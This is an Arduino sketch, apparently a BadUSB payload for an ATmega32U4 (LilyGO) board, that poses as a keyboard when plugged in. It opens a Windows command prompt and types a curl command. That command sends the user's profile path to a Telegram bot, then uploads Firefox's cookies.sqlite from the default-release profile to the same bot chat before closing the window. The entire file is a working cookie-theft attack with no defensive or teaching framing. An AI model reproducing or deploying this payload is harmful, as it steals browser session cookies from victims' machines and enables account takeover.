/*ATmega32U4 (Lily GO)*/

#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  Keyboard.begin();

  delay(1500);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(100);

  Keyboard.print("cmd");

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.print ("cmd /c curl -s -X POST \"https://api.telegram.org/bot1325051057:apixxxxxxx/sendmessage?chat_id=1268153988&text=%userprofile%\" && cd %USERPROFILE%/AppData/Roaming/Mozilla/Firefox/Profiles/*default-release && curl -s -X POST \"https://api.telegram.org/bot1325051057:apixxxxxxxxx/sendDocument?chat_id=1268153988\" -F document=@\"cookies.sqlite\"");

  typeKey(KEY_RETURN);

  delay(100);

  Keyboard.print("exit");

  typeKey(KEY_RETURN);

  Keyboard.end();
}
void loop() {}
